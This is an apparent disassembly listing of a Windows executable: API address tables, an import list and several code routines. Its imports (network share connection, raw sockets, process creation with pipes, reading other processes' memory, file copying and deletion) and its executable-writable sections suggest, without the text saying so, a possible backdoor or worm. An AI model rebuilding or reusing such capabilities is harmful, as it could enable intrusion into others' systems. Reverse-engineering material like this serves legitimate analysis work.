dword_4F53D8 dd 77E64006h ; DATA XREF: sub_40FE5C+8B�r
; sub_41B6C1+19F�r ...
off_4F53DC dd offset sub_50A9EC ; DATA XREF: sub_40FFD8+1ED�r
; sub_410908+38�r ...
off_4F53E0 dd offset sub_50A5FF ; DATA XREF: sub_410287+5ED�r
; sub_41771E+BA�r ...
dword_4F53E4 dd 77E79424h ; DATA XREF: sub_410287+27A�r
; sub_417BC7+135�r ...
dword_4F53E8 dd 77E794BFh ; DATA XREF: sub_410287+26C�r
; sub_417BC7+123�r ...
off_4F53EC dd offset sub_50A626 ; DATA XREF: sub_410287+20C�r
; sub_410287+5DC�r ...
off_4F53F0 dd offset sub_50A334 ; DATA XREF: sub_410287+1FB�r
; sub_41771E+26�r ...
off_4F53F4 dd offset sub_50B460 ; DATA XREF: sub_410908+6C�r
; sub_416788+259�r ...
dword_4F53F8 dd 77E76968h ; DATA XREF: sub_411349+5F�r
; _0:0043056A�r ...
dword_4F53FC dd 77E74C59h ; DATA XREF: sub_4115D0+CB�r
; _0:0043AAE6�r
dword_4F5400 dd 77EC7C51h ; DATA XREF: sub_411995+4B�r
; _0:0043AAEC�r
dword_4F5404 dd 77E70F89h ; DATA XREF: sub_4124E6+E�r
; sub_415A3C+D�r ...
dword_4F5408 dd 77E802FCh ; DATA XREF: sub_4133AE+18C�r
; sub_4133AE+2D4�r ...
dword_4F540C dd 77E6D75Bh ; DATA XREF: sub_4133AE+182�r
; sub_414103+FF�r ...
off_4F5410 dd offset sub_50B18D ; DATA XREF: sub_41786C+170�r
; sub_419229+C3�r ...
dword_4F5414 dd 77F51597h ; DATA XREF: sub_417A3E+41�r
; sub_417A3E+F5�r ...
dword_4F5418 dd 77F516F8h ; DATA XREF: sub_417A3E+21�r
; sub_417BC7+4A�r ...
dword_4F541C dd 77E77CB7h ; DATA XREF: sub_417A3E+10�r
; sub_417BC7+40�r ...
dword_4F5420 dd 77E7F01Ah ; DATA XREF: sub_417BC7+88�r
; sub_417D6B+53�r ...
dword_4F5424 dd 77E61A54h ; DATA XREF: sub_417BC7+56�r
; sub_417D6B+95�r ...
dword_4F5428 dd 77E7C3A5h ; DATA XREF: sub_417BC7+34�r
; sub_417D6B+2C�r ...
dword_4F542C dd 77E76A60h ; DATA XREF: sub_418C20+2D�r
; _0:0043AB34�r
dword_4F5430 dd 77E71B14h ; DATA XREF: sub_418CAA+26�r
; _0:0043AB3A�r
dword_4F5434 dd 77E7166Fh ; DATA XREF: sub_418CAA+1D�r
; _0:0043AB40�r
off_4F5438 dd offset sub_50B55B ; DATA XREF: sub_418CE5+6C�r
; _0:0043AB46�r
off_4F543C dd offset sub_50B51C ; DATA XREF: sub_418CE5+39�r
; _0:0043AB4C�r
off_4F5440 dd offset sub_50B4A4 ; DATA XREF: sub_418CE5+28�r
; _0:0043AB52�r
dword_4F5444 dd 77E7011Ah ; DATA XREF: sub_418D6A+96�r
; _0:0043AB58�r
dword_4F5448 dd 77E73CE2h ; DATA XREF: sub_418D6A+60�r
; _0:0043AB5E�r
dword_4F544C dd 77E668D9h ; DATA XREF: sub_418EAE+15D�r
; _0:0043AB64�r
dword_4F5450 dd 77E79924h ; DATA XREF: sub_4197F6+13�r
; sub_42EC50+2A5�r ...
dword_4F5454 dd 77E77CCEh ; DATA XREF: sub_4198C8+F�r
; sub_421F10+BF�r ...
dword_4F5458 dd 77E76A2Eh ; DATA XREF: sub_41A334+DE�r
; _0:0043AB76�r
dword_4F545C dd 77E7FF65h ; DATA XREF: sub_41A798+5A�r
; _0:0043AB7C�r
dword_4F5460 dd 77EB7624h ; DATA XREF: sub_41A798+3D�r
; _0:0043AB82�r
dword_4F5464 dd 77E6C29Dh ; DATA XREF: sub_41AE2B+1EF�r
; _0:0043AB88�r
dword_4F5468 dd 77E76C1Ah ; DATA XREF: sub_41B6C1+1CF�r
; _0:0043AB8E�r
dword_4F546C dd 77E73196h ; DATA XREF: sub_41D660+2A�r
; sub_4256F0+19�r ...
dword_4F5470 dd 77E7339Ch ; DATA XREF: sub_41D660+12�r
; sub_432F80+13�r ...
dword_4F5474 dd 77E6C924h ; DATA XREF: sub_41D6B0+93�r
; sub_41D6B0+102�r ...
dword_4F5478 dd 77F6183Eh ; DATA XREF: sub_43ABA6�r
dword_4F547C dd 77E76E3Dh ; DATA XREF: sub_420D80+9F�r
; sub_433090+5E�r ...
dword_4F5480 dd 77E61608h ; DATA XREF: sub_420D80+17�r
; _0:0043ABB2�r
dword_4F5484 dd 77E778C5h ; DATA XREF: sub_421620+76�r
; sub_421620+B6�r ...
dword_4F5488 dd 77E777EFh ; DATA XREF: sub_421620+62�r
; sub_421C90+2C�r ...
dword_4F548C dd 77E6177Ah ; DATA XREF: _0:004221E2�r
; sub_42FB10+87�r ...
dword_4F5490 dd 77E7C938h ; DATA XREF: _0:004221B3�r _0:0043ABCA�r
dword_4F5494 dd 77E7C486h ; DATA XREF: _0:00422126�r _0:0043ABD0�r
dword_4F5498 dd 77EB36A5h ; DATA XREF: sub_422500+3�r
; _0:0043ABD6�r
dword_4F549C dd 77E79C3Dh ; DATA XREF: _0:004225AE�r _0:004225C8�r ...
dword_4F54A0 dd 77E9BD34h ; DATA XREF: sub_422610+102�r
; sub_422610+2F3�r ...
dword_4F54A4 dd 77E79908h ; DATA XREF: sub_4231A0+9�r
; sub_4231A0+16�r ...
dword_4F54A8 dd 77EB8503h ; DATA XREF: _0:00423349�r _0:0043ABEE�r
dword_4F54AC dd 77F5722Fh ; DATA XREF: sub_423620+DA�r
; sub_423620+1BB�r ...
dword_4F54B0 dd 77E79E34h ; DATA XREF: sub_4241B0+4A8�r
; sub_4241B0+545�r ...
dword_4F54B4 dd 77E7980Ah ; DATA XREF: sub_424CD0+A3�r
; sub_424DE0+A7�r ...
dword_4F54B8 dd 77E7AC5Eh ; DATA XREF: sub_426C90+5F�r
; _0:0043AC06�r
dword_4F54BC dd 77E76E0Bh ; DATA XREF: sub_426EC0+57�r
; sub_426EC0+7C�r ...
dword_4F54C0 dd 77E7C726h ; DATA XREF: sub_426EC0+14�r
; _0:0043AC12�r
dword_4F54C4 dd 77E77CC4h ; DATA XREF: sub_428E00+64�r
; sub_428EE0+66�r ...
dword_4F54C8 dd 77E79B39h ; DATA XREF: sub_428E00+4A�r
; sub_428EE0+50�r ...
dword_4F54CC dd 77E7C5B4h ; DATA XREF: sub_428E00+9�r
; _0:0043AC24�r
dword_4F54D0 dd 77E72B29h ; DATA XREF: _0:00428EA7�r _0:0043AC2A�r
dword_4F54D4 dd 77F51587h ; DATA XREF: sub_428EE0+8B�r
; _0:0043AC30�r
dword_4F54D8 dd 77E78B61h ; DATA XREF: sub_428EE0+15�r
; _0:00428F9C�r ...
dword_4F54DC dd 77E73163h ; DATA XREF: _0:004290A3�r _0:0043AC3C�r
dword_4F54E0 dd 77E7849Fh ; DATA XREF: sub_4290B0+1C7�r
; sub_429560+17�r ...
dword_4F54E4 dd 77E7A13Fh ; DATA XREF: sub_429400+35�r
; _0:0043AC48�r
dword_4F54E8 dd 77E6C703h ; DATA XREF: sub_429400+1D�r
; _0:0043AC4E�r
dword_4F54EC dd 77E6D706h ; DATA XREF: sub_42B610+35A�r
; _0:0043AC54�r ...
dd 0
dword_4F54F4 dd 71B2ACCBh ; DATA XREF: sub_43A936�r
dd 0
dword_4F54FC dd 71AB4122h ; DATA XREF: sub_4153D2+D4�r
; _0:0043A9B4�r
dword_4F5500 dd 71AB1746h ; DATA XREF: sub_412F1F+1DE�r
; sub_412F1F+1F0�r ...
dword_4F5504 dd 71AB401Ch ; DATA XREF: sub_412F1F+21B�r
; _0:0043A9A8�r
dword_4F5508 dd 71AB1836h ; DATA XREF: sub_40F909+6E�r
; sub_40F986+8E�r ...
dword_4F550C dd 71AB41DAh ; DATA XREF: sub_40F2F1+4A�r
; sub_40F909+15�r ...
dword_4F5510 dd 71AB3F8Dh ; DATA XREF: sub_40F2F1+5A�r
; _0:0043A996�r
dword_4F5514 dd 71AB155Ah ; DATA XREF: sub_40F2F1+8D�r
; sub_413F6A+6E�r ...
dword_4F5518 dd 71AB3ECEh ; DATA XREF: sub_40F2F1+B5�r
; _0:0043A98A�r
dword_4F551C dd 71AB5DE2h ; DATA XREF: sub_40F2F1+C9�r
; _0:0043A984�r
dword_4F5520 dd 71AB868Dh ; DATA XREF: sub_40F2F1+16F�r
; _0:0043A97E�r
dword_4F5524 dd 71AB5A01h ; DATA XREF: sub_4154BB+20�r
; _0:0043A9BA�r
dword_4F5528 dd 71AB12F8h ; DATA XREF: sub_40E794+27�r
; sub_40E8D6+27�r ...
dword_4F552C dd 71AB1746h ; DATA XREF: sub_40E794+36�r
; sub_40E8D6+36�r ...
dword_4F5530 dd 71AB3E5Dh ; DATA XREF: sub_40E794+59�r
; sub_40E8D6+59�r ...
dword_4F5534 dd 71AB5690h ; DATA XREF: sub_40E794+6A�r
; sub_40E8D6+6A�r ...
dword_4F5538 dd 71AB1A6Dh ; DATA XREF: sub_40E794+E0�r
; sub_40E8D6+E0�r ...
dword_4F553C dd 71AB3C22h ; DATA XREF: _0:0040DAC8�r
; sub_40E794+45�r ...
dword_4F5540 dd 71AB1AF4h ; DATA XREF: sub_40D746+12�r
; sub_40E794+C3�r ...
dword_4F5544 dd 71AB1890h ; DATA XREF: sub_40D5A3+4C�r
; sub_40F2F1+106�r ...
dword_4F5548 dd 71AB1B7Bh ; DATA XREF: sub_43A942�r
dword_4F554C dd 71AB157Eh ; DATA XREF: sub_401C87+2F98�r
; _0:0043A93C�r
dword_4F5550 dd 71AB2BBFh ; DATA XREF: _0:0040E9D7�r _0:0043A978�r
align 8
db 6
align 2
aWnetaddconne_1 db 'WNetAddConnection2A',0
aMpr_dll_0 db 'MPR.dll',0
aA_3 db 'A',0
aWsasocketa_0 db 'WSASocketA',0
align 4
aWs2_32_dll_0 db 'WS2_32.dll',0
align 10h
db '',0
aExitprocess_0 db 'ExitProcess',0
a4_0 db '4',0
aClosehandle_0 db 'CloseHandle',0
aF db 'f',0
aCreateproces_0 db 'CreateProcessA',0
align 2
dw 17Dh
aGetmodulefil_0 db 'GetModuleFileNameA',0
align 4
db 0C1h ;
db 1, 47h, 65h
aTsystemdirecto db 'tSystemDirectoryA',0
dw 356h
aSleep_0 db 'Sleep',0
aO_0 db 'o',0
aCreatethread_0 db 'CreateThread',0
align 2
aG db '',0
aDeletefilea_0 db 'DeleteFileA',0
dd 704F0286h, 72506E65h, 7365636Fh, 1430073h
aGetcurrentpr_1 db 'GetCurrentProcessId',0
db 71h ; q
db 1, 47h, 65h
aTlasterror db 'tLastError',0
align 4
aC_4 db 'C',0
aCopyfilea db 'CopyFileA',0
db 19h
db 3, 53h, 65h
aTfileattribute db 'tFileAttributesA',0
align 2
dw 15Eh
aGetfileattri_2 db 'GetFileAttributesA',0
align 4
db 7Fh ;
db 1, 47h, 65h
aTmodulehandlea db 'tModuleHandleA',0
align 10h
db 90h
db 3, 57h, 61h
aItforsingleobj db 'itForSingleObject',0
db '`',0
aCreatemutexa db 'CreateMutexA',0
align 2
dw 1DFh
aGettickcount_0 db 'GetTickCount',0
align 2
dw 35Fh
aTerminatethrea db 'TerminateThread',0
dd 654701D5h, 6D655474h, 74615070h, 4168h, 6F4D026Eh, 69466576h
dd 41656Ch, 6F4C0252h, 694C6461h, 72617262h, 4179h, 654701A0h
dd 6F725074h, 64644163h, 73736572h, 1140000h, 43746547h
dd 75706D6Fh, 4E726574h, 41656D61h, 1740000h, 4C746547h
dd 6C61636Fh, 666E4965h, 416Fh, 654701E9h, 72655674h, 6E6F6973h
dd 417845h, 784500BAh, 68547469h, 64616572h, 2510000h
aLeavecritica_0 db 'LeaveCriticalSection',0
align 2
aS_30 db '',0
aEntercritica_0 db 'EnterCriticalSection',0
align 2
dw 224h
aInitializecr_0 db 'InitializeCriticalSectionAndSpinCount',0
aB db '',0
aDeletecritic_0 db 'DeleteCriticalSection',0
dw 3A4h
aWritefile_0 db 'WriteFile',0
aO_1 db 'O',0
aCreateeventa db 'CreateEventA',0
align 2
dw 2B5h
aReadfile_1 db 'ReadFile',0
align 2
aS_31 db 'S',0
aCreatefilea_0 db 'CreateFileA',0
dd 6554035Eh, 6E696D72h, 50657461h, 65636F72h, 7373h, 75440093h
dd 63696C70h, 48657461h, 6C646E61h, 1420065h
aGetcurrentpr_2 db 'GetCurrentProcess',0
aE_0 db 'e',0
aCreatepipe db 'CreatePipe',0
align 4
dd 654701E0h, 6D695474h, 726F4665h, 4174616Dh, 1470000h
dd 44746547h, 46657461h, 616D726Fh, 4174h, 65470163h, 6C694674h
dd 7A695365h, 0CE0065h, 646E6946h, 736F6C43h, 0C50065h
aFiletimetosyst db 'FileTimeToSystemTime',0
align 2
db '',0
aFiletimetoloca db 'FileTimeToLocalFileTime',0
db '',0
aFindnextfile_0 db 'FindNextFileA',0
db '',0
aFindfirstfil_0 db 'FindFirstFileA',0
align 2
dw 31Bh
aSetfilepoint_0 db 'SetFilePointer',0
align 4
db 0EEh ;
db 2, 53h, 65h
aTconsolectrlha db 'tConsoleCtrlHandler',0
db 8Eh ;
db 3, 57h, 61h
aItformultipleo db 'itForMultipleObjects',0
align 2
dw 0FCh
aGenerateconsol db 'GenerateConsoleCtrlEvent',0
align 2
dw 173h
aGetlocaltime db 'GetLocalTime',0
align 2
dw 2A3h
aQueryperform_1 db 'QueryPerformanceCounter',0
db 0A4h ;
db 2, 51h, 75h
aEryperformance db 'eryPerformanceFrequency',0
dd 724600F8h, 694C6565h, 72617262h, 1590079h
aGetenvironme_0 db 'GetEnvironmentVariableW',0
db 16h
db 2, 48h, 65h
aApfree db 'apFree',0
align 4
db 10h
db 2, 48h, 65h
aApalloc db 'apAlloc',0
db 0A3h ;
db 1, 47h, 65h
aTprocessheap db 'tProcessHeap',0
align 2
dw 389h
aVirtualqueryex db 'VirtualQueryEx',0
align 4
db 0B8h ;
db 2, 52h, 65h
aAdprocessmemor db 'adProcessMemory',0
dd 654701C5h, 73795374h, 496D6574h, 6F666Eh, 6F4600F3h
dd 74616D72h, 7373654Dh, 41656761h, 20A0000h, 626F6C47h
dd 6E556C61h, 6B636F6Ch, 2030000h, 626F6C47h, 6F4C6C61h
dd 6B63h, 6E550371h, 5670616Dh, 4F776569h, 6C694666h, 2680065h
dd 5670614Dh, 4F776569h, 6C694666h, 540065h
aCreatefilema_1 db 'CreateFileMappingA',0
align 10h
db 1Fh
db 3, 53h, 65h
aTfiletime db 'tFileTime',0
dw 165h
aGetfiletime_0 db 'GetFileTime',0
db '',0
aExpandenvironm db 'ExpandEnvironmentStringsA',0
db 94h ;
db 3, 57h, 69h
aDechartomultib db 'deCharToMultiByte',0
dw 275h
aMultibytetow_0 db 'MultiByteToWideChar',0
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
db 3, 6Ch, 73h
aTrcmpia db 'trcmpiA',0
db 5Ah ; Z
db 1, 47h, 65h
aTexitcodeproce db 'tExitCodeProcess',0
align 2
dw 291h
aPeeknamedpipe db 'PeekNamedPipe',0
dw 178h
aGetlogicaldr_0 db 'GetLogicalDrives',0
align 2
dw 204h
aGlobalmemoryst db 'GlobalMemoryStatus',0
align 10h
db 36h ; 6
db 2, 49h, 73h
aBadwriteptr db 'BadWritePtr',0
db 33h ; 3
db 2, 49h, 73h
aBadreadptr db 'BadReadPtr',0
align 10h
db 20h
db 2, 48h, 65h
aApvalidate db 'apValidate',0
align 10h
db 0D7h ;
db 2, 52h, 74h
aLunwind db 'lUnwind',0
db 0E2h ;
db 1, 47h, 65h
aTtimezoneinfor db 'tTimeZoneInformation',0
align 2
dw 1C8h
aGetsystemtime db 'GetSystemTime',0
dw 228h
aInterlockeddec db 'InterlockedDecrement',0
align 2
dw 22Ch
aInterlockedinc db 'InterlockedIncrement',0
align 2
dw 1B7h
aGetstartupinfo db 'GetStartupInfoA',0
dd 65470110h, 6D6F4374h, 646E616Dh, 656E694Ch, 1E80041h
dd 56746547h, 69737265h, 6E6Fh, 65440078h, 42677562h, 6B616572h
dd 1B90000h, 53746547h, 61486474h, 656C646Eh, 28D0000h
aOutputdebugstr db 'OutputDebugStringA',0
align 4
db 23h ; #
db 2, 49h, 6Eh
aItializecritic db 'itializeCriticalSection',0
db '',0
aFatalappexita db 'FatalAppExitA',0
db 1Ah
db 2, 48h, 65h
aAprealloc db 'apReAlloc',0
dw 383h
aVirtualfree_0 db 'VirtualFree',0
db 81h ;
db 3, 56h, 69h
aRtualalloc db 'rtualAlloc',0
align 4
db 58h ; X
db 1, 47h, 65h
aTenvironmentva db 'tEnvironmentVariableA',0
dw 214h
aHeapdestroy db 'HeapDestroy',0
dd 65480212h, 72437061h, 65746165h, 1460000h
aGetcurrentthre db 'GetCurrentThreadId',0
align 10h
dd 6C540366h, 74655373h, 756C6156h, 3630065h, 41736C54h
dd 636F6C6Ch, 3640000h, 46736C54h, 656572h, 65530328h
dd 73614C74h, 72724574h, 726Fh, 6C540365h, 74654773h, 756C6156h
dd 1450065h, 43746547h, 65727275h, 6854746Eh, 64616572h
dd 1040000h, 43746547h, 666E4950h, 0FD006Fh, 41746547h
dd 5043h, 65470193h, 4D454F74h, 5043h, 615202A7h, 45657369h
dd 70656378h, 6E6F6974h, 2440000h, 614D434Ch, 72745370h
dd 41676E69h, 2450000h, 614D434Ch, 72745370h, 57676E69h
dd 36E0000h
aUnhandledexcep db 'UnhandledExceptionFilter',0
align 2
dw 0F6h
aFreeenvironmen db 'FreeEnvironmentStringsA',0
db 0F7h ;
align 2
aFreeenvironm_0 db 'FreeEnvironmentStringsW',0
dw 155h
aGetenvironme_1 db 'GetEnvironmentStrings',0
dw 157h
aGetenvironme_2 db 'GetEnvironmentStringsW',0
align 4
db 24h ; $
db 3, 53h, 65h
aThandlecount db 'tHandleCount',0
align 2
dw 166h
aGetfiletype db 'GetFileType',0
db 37h ; 7
db 3, 53h, 65h
aTstdhandle db 'tStdHandle',0
align 4
aU_0 db '',0
aFlushfilebuf_0 db 'FlushFileBuffers',0
align 10h
db 0BAh ;
db 1, 47h, 65h
aTstringtypea db 'tStringTypeA',0
align 2
dw 1BDh
aGetstringtypew db 'GetStringTypeW',0
align 4
db 4Ah ; J
db 3, 53h, 65h
aTunhandledexce db 'tUnhandledExceptionFilter',0
dw 230h
aIsbadcodeptr db 'IsBadCodePtr',0
align 2
dw 241h
aIsvalidlocale db 'IsValidLocale',0
dw 23Fh
aIsvalidcodepag db 'IsValidCodePage',0
aP_0 db '',0
aEnumsystemloca db 'EnumSystemLocalesA',0
align 2
dw 1E3h
aGetuserdefault db 'GetUserDefaultLCID',0
align 10h
dd 65530310h, 646E4574h, 6946664Fh, 656Ch, 65470175h, 636F4C74h
dd 49656C61h, 576F666Eh, 3A0000h, 706D6F43h, 53657261h
dd 6E697274h, 4167h, 6F43003Bh, 7261706Dh, 72745365h, 57676E69h
dd 3130000h
aSetenvironme_0 db 'SetEnvironmentVariableA',0
aKernel32_dll_1 db 'KERNEL32.dll',0
db 0
_3 ends
; Section 5. (virtual address 000F6000)
; Virtual size : 0000510E ( 20750.)
; Section size in file : 0000510E ( 20750.)
; Offset to raw data for section: 000F6000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_4 segment para public 'CODE' use32
assume cs:_4
;org 4F6000h
assume es:nothing, ss:nothing, ds:_0, fs:nothing, gs:nothing
dd 1443h dup(0)
db 2 dup(0)
_4 ends
; Section 6. (virtual address 000FC000)
; Virtual size : 00011ABF ( 72383.)
; Section size in file : 00011ABF ( 72383.)
; Offset to raw data for section: 000FC000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_5 segment para public 'CODE' use32
assume cs:_5
;org 4FC000h
assume es:nothing, ss:nothing, ds:_0, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4FC000 proc near ; CODE XREF: sub_4FF63E+84�p
; sub_4FF94C+333�p ...
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50E2E0
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov esi, ecx
mov [ebp+var_1C], esi
lea eax, [esi+10h]
push eax
call ds:dword_50E01C ; RtlEnterCriticalSection
and [ebp+var_4], 0
push [ebp+arg_4]
push [ebp+arg_0]
mov ecx, esi
call sub_50B98E
or [ebp+var_4], 0FFFFFFFFh
call sub_4FC060
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
sub_4FC000 endp
; =============== S U B R O U T I N E =======================================
sub_4FC05D proc near ; DATA XREF: _6:0050E2E8�o
mov esi, [ebp-1Ch]
sub_4FC05D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4FC060 proc near ; CODE XREF: sub_4FC000+47�p
add esi, 10h
push esi
call ds:dword_50E018 ; RtlLeaveCriticalSection
retn
sub_4FC060 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4FC06B proc near ; CODE XREF: sub_4FF166+9B�p
; sub_4FF166+C4�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov edx, [ebp+arg_4]
push edi
test edx, edx
jz short loc_4FC07D
mov edi, [ebp+arg_0]
test edi, edi
jnz short loc_4FC081
loc_4FC07D: ; CODE XREF: sub_4FC06B+9�j
xor eax, eax
jmp short loc_4FC0D3
; ---------------------------------------------------------------------------
loc_4FC081: ; CODE XREF: sub_4FC06B+10�j
cmp byte ptr [edx], 0
jnz short loc_4FC08F
xor eax, eax
cmp [edi], al
setz al
jmp short loc_4FC0D3
; ---------------------------------------------------------------------------
loc_4FC08F: ; CODE XREF: sub_4FC06B+19�j
push ebx
push esi
mov esi, offset dword_510BE4
mov eax, edi
loc_4FC098: ; CODE XREF: sub_4FC06B+49�j
mov bl, [eax]
mov cl, bl
cmp bl, [esi]
jnz short loc_4FC0BA
test cl, cl
jz short loc_4FC0B6
mov bl, [eax+1]
mov cl, bl
cmp bl, [esi+1]
jnz short loc_4FC0BA
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_4FC098
loc_4FC0B6: ; CODE XREF: sub_4FC06B+37�j
xor eax, eax
jmp short loc_4FC0BF
; ---------------------------------------------------------------------------
loc_4FC0BA: ; CODE XREF: sub_4FC06B+33�j
; sub_4FC06B+41�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_4FC0BF: ; CODE XREF: sub_4FC06B+4D�j
pop esi
pop ebx
test eax, eax
jnz short loc_4FC0CA
mov edi, offset dword_510BE0
loc_4FC0CA: ; CODE XREF: sub_4FC06B+58�j
push edx
push edi
call sub_4FC0D6
pop ecx
pop ecx
loc_4FC0D3: ; CODE XREF: sub_4FC06B+14�j
; sub_4FC06B+22�j
pop edi
pop ebp
retn
sub_4FC06B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4FC0D6 proc near ; CODE XREF: sub_4FC06B+61�p
; sub_4FC0D6+70�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_0]
push esi
mov esi, [ebp+arg_4]
mov al, [ebx]
push edi
test al, al
jz short loc_4FC120
loc_4FC0E8: ; CODE XREF: sub_4FC0D6+48�j
movsx edi, byte ptr [esi]
movsx eax, al
inc ebx
cmp eax, 2Ah
jz short loc_4FC130
cmp eax, 3Fh
jz short loc_4FC115
push eax
call sub_4FC86E
mov edx, eax
push edi
mov [ebp+arg_4], edx
call sub_4FC86E
pop ecx
pop ecx
mov ecx, [ebp+arg_4]
cmp eax, ecx
jnz short loc_4FC12C
jmp short loc_4FC119
; ---------------------------------------------------------------------------
loc_4FC115: ; CODE XREF: sub_4FC0D6+21�j
test edi, edi
jz short loc_4FC12C
loc_4FC119: ; CODE XREF: sub_4FC0D6+3D�j
mov al, [ebx]
inc esi
test al, al
jnz short loc_4FC0E8
loc_4FC120: ; CODE XREF: sub_4FC0D6+10�j
xor eax, eax
cmp [esi], al
setz al
loc_4FC127: ; CODE XREF: sub_4FC0D6+58�j
; sub_4FC0D6+86�j
pop edi
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4FC12C: ; CODE XREF: sub_4FC0D6+3B�j
; sub_4FC0D6+41�j ...
xor eax, eax
jmp short loc_4FC127
; ---------------------------------------------------------------------------
loc_4FC130: ; CODE XREF: sub_4FC0D6+1C�j
xor edi, edi
cmp byte ptr [esi], 0
jz short loc_4FC142
loc_4FC137: ; CODE XREF: sub_4FC0D6+66�j
inc edi
cmp byte ptr [edi+esi], 0
jnz short loc_4FC137
test edi, edi
jl short loc_4FC12C
loc_4FC142: ; CODE XREF: sub_4FC0D6+5F�j
add esi, edi
loc_4FC144: ; CODE XREF: sub_4FC0D6+7F�j
push esi
push ebx
call sub_4FC0D6
pop ecx
test eax, eax
pop ecx
jnz short loc_4FC159
dec edi
dec esi
test edi, edi
jge short loc_4FC144
jmp short loc_4FC12C
; ---------------------------------------------------------------------------
loc_4FC159: ; CODE XREF: sub_4FC0D6+79�j
push 1
pop eax
jmp short loc_4FC127
sub_4FC0D6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4FC15E proc near ; DATA XREF: sub_4FC271+36�o
var_60 = dword ptr -60h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 60h
push edi
cmp [ebp+arg_4], 0Fh
jnz loc_4FC1FF
and [ebp+var_20], 0
xor eax, eax
lea edi, [ebp+var_1C]
stosd
stosd
stosd
stosd
stosd
lea eax, [ebp+var_20]
push eax
push 18h
push ds:dword_515A50
call ds:dword_5117F8 ; GetObjectA
lea eax, [ebp+var_60]
push eax
push [ebp+arg_0]
call ds:dword_5117F0 ; BeginPaint
push [ebp+var_60]
call ds:dword_5117E0 ; CreateCompatibleDC
mov [ebp+var_8], eax
push ds:dword_515A50
push [ebp+var_8]
call ds:dword_5117FC ; SelectObject
mov [ebp+var_4], eax
push 0CC0020h
push 0
push 0
push [ebp+var_8]
push [ebp+var_18]
push [ebp+var_1C]
push 0
push 0
push [ebp+var_60]
call ds:dword_511804 ; BitBlt
push [ebp+var_4]
push [ebp+var_8]
call ds:dword_5117FC ; SelectObject
push [ebp+var_8]
call ds:dword_5117E8 ; DeleteDC
lea eax, [ebp+var_60]
push eax
push [ebp+arg_0]
call ds:dword_5117F4 ; EndPaint
xor eax, eax
jmp short loc_4FC211
; ---------------------------------------------------------------------------
loc_4FC1FF: ; CODE XREF: sub_4FC15E+B�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_50E050 ; DefWindowProcA
loc_4FC211: ; CODE XREF: sub_4FC15E+9F�j
pop edi
leave
retn 10h
sub_4FC15E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4FC216 proc near ; DATA XREF: sub_4FC271+152�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call ds:dword_511808 ; GetWindowThreadProcessId
call ds:dword_5116E8 ; GetCurrentProcessId
cmp [ebp+var_4], eax
jnz short loc_4FC26A
mov eax, [ebp+arg_0]
cmp eax, ds:dword_515A54
jz short loc_4FC26A
push ds:dword_515A54
call ds:dword_51182C ; DestroyWindow
and ds:dword_515A54, 0
push [ebp+arg_0]
call ds:dword_51180C ; SetActiveWindow
push [ebp+arg_0]
call ds:dword_511810 ; SetForegroundWindow
xor eax, eax
jmp short locret_4FC26D
; ---------------------------------------------------------------------------
loc_4FC26A: ; CODE XREF: sub_4FC216+1E�j
; sub_4FC216+29�j
push 1
pop eax
locret_4FC26D: ; CODE XREF: sub_4FC216+52�j
leave
retn 8
sub_4FC216 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4FC271 proc near ; DATA XREF: sub_4FC3F3+3C�o
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 58h
push edi
mov eax, [ebp+arg_0]
mov ds:dword_515A50, eax
and [ebp+var_38], 0
xor eax, eax
lea edi, [ebp+var_34]
stosd
stosd
stosd
stosd
stosd
lea eax, [ebp+var_38]
push eax
push 18h
push [ebp+arg_0]
call ds:dword_5117F8 ; GetObjectA
mov ds:dword_515A60, 30h
mov ds:dword_515A68, offset sub_4FC15E
mov ds:dword_515A88, offset aCc7574e45e3947 ; "{CC7574E4-5E39-4700-B286-269A82DD8E95}"
push 0
call ds:dword_511718 ; GetModuleHandleA
mov ds:dword_515A74, eax
push offset dword_515A60
call ds:dword_511814 ; RegisterClassExA
push 10h
call ds:dword_511818 ; GetSystemMetrics
mov [ebp+var_20], eax
push 11h
